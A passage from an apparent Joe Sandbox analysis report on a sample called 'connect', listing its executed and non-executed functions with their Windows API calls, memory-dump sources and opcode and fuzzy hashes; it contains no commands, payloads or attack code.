                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fddba1c115b818bc94c5485435f841ec90c9dbfd8bdc5c7c25a963fdd6413526
                                                            • Instruction ID: 938116e0337dc1b4ebe23af26a4cc00a08dbdfa04c6e7bcda7d87b55809bb478
                                                            • Opcode Fuzzy Hash: fddba1c115b818bc94c5485435f841ec90c9dbfd8bdc5c7c25a963fdd6413526
                                                            • Instruction Fuzzy Hash: 68F049312007049BDB24DFA5C848B57B7E8BF08306F00496EE88796AA0D378F984CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041DFAC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 86b40fc351ba2f4055b206905b4deaaf01ef2d9e0ac121e8b5c970df7daf89ed
                                                            • Instruction ID: 46087af22cc9f3194ef36d2ec6b42f14b3ee82c13acaad46154efdfb6f1f01b6
                                                            • Opcode Fuzzy Hash: 86b40fc351ba2f4055b206905b4deaaf01ef2d9e0ac121e8b5c970df7daf89ed
                                                            • Instruction Fuzzy Hash: A0E0E572A4412167D62036664C04FDB3648AB113B0F060127EC07962D0DF2CDEC381ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406323 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(?,?,?), ref: 0040635F
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
                                                            • API String ID: 1431749950-0
                                                            • Opcode ID: ff310d2f4d264aab1488cbb56c73fcf1b2292ea57a0b6491f1298fc6d7c9ef9d
                                                            • Instruction ID: 3584ce183ac66dcee4d3da3f78cc69325c7a8bd72f4a4539beab89e37a2be05f
                                                            • Opcode Fuzzy Hash: ff310d2f4d264aab1488cbb56c73fcf1b2292ea57a0b6491f1298fc6d7c9ef9d
                                                            • Instruction Fuzzy Hash: 76F0FE31900028AFCB21EFA8E955C8DB778EB04704751017AE951B71B5DB74E955CB89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004100FB Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004100DC: CloseHandle.KERNEL32(?,?,00410106,?,?,004101AE,?,80000000,?,?,?,?,00410204,?,?,00000003), ref: 004100E6
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,?,004101AE,?,80000000,?,?,?), ref: 0041011D
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID:
                                                            • API String ID: 3498533004-0
                                                            • Opcode ID: 4aa649382fce26b55a7b349a6d9be6851cb8bdbc3db7faf333bf7ba19a250481
                                                            • Instruction ID: 3bda68918014af92a18ec1d6ff386179063afc01e80f315912aefd7d41a8900e
                                                            • Opcode Fuzzy Hash: 4aa649382fce26b55a7b349a6d9be6851cb8bdbc3db7faf333bf7ba19a250481
                                                            • Instruction Fuzzy Hash: FDE0E632100219FBCF215F949C02FCA3F56AF09360F148515FA50551E1C7B7D8B1A794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041037F Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,00000001,00000001,00000000,?,0041035C,?,00000001,00000000,?,?,00000000,?,?,00410704), ref: 004103A2
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 8a2e6c0334bc89f23ba97bcf6f1b71ff15e7377b0494ce4e358ccbed341504c3
                                                            • Instruction ID: ee1ce227f3de7638b596e8d67e90bca51049101c08e26ea773461c5066e1ff3e
                                                            • Opcode Fuzzy Hash: 8a2e6c0334bc89f23ba97bcf6f1b71ff15e7377b0494ce4e358ccbed341504c3
                                                            • Instruction Fuzzy Hash: D7E0E532200209EFDB00CF10D841FAA37AAFB88714F10C128E9188A210D331AA20DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410208 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0041021E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: b2966b1f594beaf1cdb3379fdf7b496eb4a4013e10939ec8060e69e40cf878ae
                                                            • Instruction ID: 712165946dbccbce052d5cf3575313d631740563f223044b1cc96b913347409f
                                                            • Opcode Fuzzy Hash: b2966b1f594beaf1cdb3379fdf7b496eb4a4013e10939ec8060e69e40cf878ae
                                                            • Instruction Fuzzy Hash: 8FE0E236200208FFDB01CF90CD02FDEBBBAFB09315F218068E90596260C775AA24EB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b51ba3e21471197fd7b19de1848bb2bd89840025a8f31db43887408cea7bc69a
                                                            • Instruction ID: 8a6dbab1503f223adf457108e3060717b1f0410a44a94b9f5fe87d3162458e2a
                                                            • Opcode Fuzzy Hash: b51ba3e21471197fd7b19de1848bb2bd89840025a8f31db43887408cea7bc69a
                                                            • Instruction Fuzzy Hash: F1D01732900119BBDF019F85CD02EDFBF79FF48358F04800AB91022110C7799E219BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410316 Relevance: 1.5, APIs: 1, Instructions: 11timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileTime.KERNELBASE(?,?,?,?,?,00410312,00000000,00000000,?,?,0040328B,?), ref: 00410324
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FileTime
                                                            • String ID:
                                                            • API String ID: 1425588814-0
                                                            • Opcode ID: bef36c2d5d51467852bdf919efe3e619284bbc074ea7a60251296c3309afb911
                                                            • Instruction ID: 0b1b4e816c1c98c4e0a14e63c63236b17ea5cebd010971defeb666130602266a
                                                            • Opcode Fuzzy Hash: bef36c2d5d51467852bdf919efe3e619284bbc074ea7a60251296c3309afb911
                                                            • Instruction Fuzzy Hash: 5AC00236104209FB8F025FA2DC05D9A7F6ABB15660B45C029FA1444531D6339970AB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00410586 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 4e7e932315972d7a1cb331239494c380b0a8b7908a966075448890339087a9e8
                                                            • Instruction ID: d424c3454f48e7beab3a94e3b11bbe46388bad226bd9455f7b56c92a28274dbd
                                                            • Opcode Fuzzy Hash: 4e7e932315972d7a1cb331239494c380b0a8b7908a966075448890339087a9e8
                                                            • Instruction Fuzzy Hash: 2D018B3120011AFB8B25CE44C9009EBB77ABF45390B10412AA8469A210D778EDC2EFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F26A Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,?,0040F259,?), ref: 0040F283
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 859a696bafe92b3a3be3b636d88bf7c3aebd282be5aaff5006cbab1e0d332859
                                                            • Instruction ID: d7616fbe283b33869d826b4ba6cdf178ba42b6c63659d055e5d80fbe989b1a3d
                                                            • Opcode Fuzzy Hash: 859a696bafe92b3a3be3b636d88bf7c3aebd282be5aaff5006cbab1e0d332859
                                                            • Instruction Fuzzy Hash: 10C0803128470CBAEF200BD0EC07FF537599704796F404071F70C589D0C3F550A44548
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F28B Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,0040F267,?), ref: 0040F29E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 6f8ba64330515f514d571827726dcf710a52b3aedd9b8a4091684db6c379ba5c
                                                            • Instruction ID: e327ccc1f53dfadda06dfc10c65c837ca157fabb5a534c983d80fdeb548d9001
                                                            • Opcode Fuzzy Hash: 6f8ba64330515f514d571827726dcf710a52b3aedd9b8a4091684db6c379ba5c
                                                            • Instruction Fuzzy Hash: 77C04C30140608ABDB615A44DC0ABA57B59AB00755F508075B60C285F187B5A5A5CA88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 004041E0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 00404227
                                                            • wsprintfW.USER32 ref: 00404238
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                            • GetLastError.KERNEL32 ref: 00404252
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                            • GetLastError.KERNEL32 ref: 00404287
                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                            • SetLastError.KERNEL32(00401877), ref: 004042CD
                                                            • lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                            • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                            • MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DB8,00000001,00000000,00000002), ref: 00404388
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariable$ByteCharInfoLocaleMultiWidelstrcmpilstrlenwsprintf
                                                            • String ID: SfxString%d
                                                            • API String ID: 1827968993-944934635
                                                            • Opcode ID: a326b080e226af72641dfd04935a279939e98ecb1d5eda7927808de41d5699fb
                                                            • Instruction ID: ca602cd6480d511b9cd4e405eb21b796c1e570c44d1a6a7c7451b56f947e994c
                                                            • Opcode Fuzzy Hash: a326b080e226af72641dfd04935a279939e98ecb1d5eda7927808de41d5699fb
                                                            • Instruction Fuzzy Hash: 99419FB1701204EBDB28DB65EC59F6A77B8FB84740B10563EF60ADB290D634A841CB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404C1A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00404C25
                                                            • FindResourceExA.KERNEL32(00000000,?,?), ref: 00404C42
                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00404C56
                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00404C67
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00404C71
                                                            • LockResource.KERNEL32(00000000), ref: 00404C7C
                                                            • GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00404CA8
                                                            • wsprintfW.USER32 ref: 00404CC6
                                                            • GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00404CDE
                                                            Strings
                                                            • SetThreadPreferredUILanguages, xrefs: 00404CD3
                                                            • %04X%c%04X%c, xrefs: 00404CC0
                                                            • SetProcessPreferredUILanguages, xrefs: 00404C93
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
                                                            • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
                                                            • API String ID: 2090077119-3413765421
                                                            • Opcode ID: 6660de87076bbd057e6d5408347a3214745afe7a738e4b90544cdab1bc97c9d6
                                                            • Instruction ID: 62fe8c21659d8f19fc90c2fd40a41e381318da5d1ab9cb807a7fae9adc104c85
                                                            • Opcode Fuzzy Hash: 6660de87076bbd057e6d5408347a3214745afe7a738e4b90544cdab1bc97c9d6
                                                            • Instruction Fuzzy Hash: 3421D4B2705224BFEB215F659D85F6B3AACEB44B50F46013AFB04A2290D7B48C01D6AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408F95 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408FA4
                                                            • SetWindowsHookExW.USER32(00000007,Function_00009F59,00000000,00000000), ref: 00408FB4
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408FC8
                                                            • SetWindowsHookExW.USER32(00000002,Function_00009F2A,00000000,00000000), ref: 00408FD8
                                                            • EndDialog.USER32(?,00000000), ref: 00409003
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CurrentHookThreadWindows$Dialog
                                                            • String ID:
                                                            • API String ID: 1967849563-0
                                                            • Opcode ID: 2124afb64cc32f50d7272b48b64c9d1849f6e9de8ae831c7826abe82f726416e
                                                            • Instruction ID: 8586e3d2c7ae4f547ed799ceb034abc9ad9b5b6e58f6eec5ed414f51944f2def
                                                            • Opcode Fuzzy Hash: 2124afb64cc32f50d7272b48b64c9d1849f6e9de8ae831c7826abe82f726416e
                                                            • Instruction Fuzzy Hash: 77F06230240321DFE7306B60EC0DB6A77A8E708711F41553BE646915E1CBF95885CF5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004038DD Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 275comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000019,00000000), ref: 00403997
                                                            • CoCreateInstance.OLE32(00428EE4,00000000,00000001,00428EA4,?,.lnk,?), ref: 00403AFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CreateFolderInstancePathSpecial
                                                            • String ID: .lnk
                                                            • API String ID: 3960669845-24824748
                                                            • Opcode ID: 5c32a1a42dad0e6fba41cda197fec51928c7f4b3f704ffa692d532c368de0648
                                                            • Instruction ID: 44399dac6a4e4d24459e5b8c8b1da727878d59262624d422415e3c288f2adb4d
                                                            • Opcode Fuzzy Hash: 5c32a1a42dad0e6fba41cda197fec51928c7f4b3f704ffa692d532c368de0648
                                                            • Instruction Fuzzy Hash: 8C91AF71900118AECB14EFA5DC55DEEBB78EF04309F10402EF506A61E1EB79AE82CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040493F Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040496E
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00404980
                                                            • FreeSid.ADVAPI32(?), ref: 00404989
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: f341d5858635c32a3842cc5ccc92d0fbf7a255c5229dfdb0991bff57df6e8d4b
                                                            • Instruction ID: d36a6a43374de4970cfb710a451365c27491d80713a9525f54b4ff8bd746f58d
                                                            • Opcode Fuzzy Hash: f341d5858635c32a3842cc5ccc92d0fbf7a255c5229dfdb0991bff57df6e8d4b
                                                            • Instruction Fuzzy Hash: 40F07AB5A0020CFFEB10DFD5DD89EAEBBBCFB08744F5054A5A601A2191D7709E059B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041DF34 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `:C
                                                            • API String ID: 0-2112543841
                                                            • Opcode ID: bc95f443e0c627cb05bc1b681998389037e66d0a054203f01f69637185ed6526
                                                            • Instruction ID: 89e51e6070ad7cc876a2804e9dd6a6d54795e602025a3e6d2250214c028d76ad
                                                            • Opcode Fuzzy Hash: bc95f443e0c627cb05bc1b681998389037e66d0a054203f01f69637185ed6526
                                                            • Instruction Fuzzy Hash: 1EF0A072A18228ABCB22DA4CC805AD9B3ACEB08B61F01409BF401D7210C378DF80C7C4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041DF79 Relevance: .0, Instructions: 23COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e82c60afa3c786a30053e3e8471f27a2342202721acd41fd688a588ba108322c
                                                            • Instruction ID: 7806c912818c80f375dafd81624392413bcf517fa20537c6556223725f0b3e8c
                                                            • Opcode Fuzzy Hash: e82c60afa3c786a30053e3e8471f27a2342202721acd41fd688a588ba108322c
                                                            • Instruction Fuzzy Hash: F7E04672E16228EB8724EAC9894499AF3ACEB49B11B1105ABB909D3200C2749E41CBD4
                                                            Uniqueness

